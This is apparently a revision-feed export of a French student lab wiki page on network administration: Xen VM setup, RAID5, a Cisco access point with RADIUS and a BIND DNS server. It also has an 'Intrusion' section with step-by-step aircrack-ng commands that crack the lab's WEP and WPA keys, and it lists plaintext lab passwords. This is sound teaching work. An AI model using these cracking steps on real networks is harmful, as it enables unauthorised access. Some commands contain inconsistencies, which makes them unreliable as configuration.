 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
==Réseau privé VLAN 20==&lt;br /&gt;
&lt;br /&gt;
Configuration Wifi EAP :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 On considère la commande ci-dessous de la configuration précédente :&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60256</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60256"/>
				<updated>2022-11-28T23:18:48Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
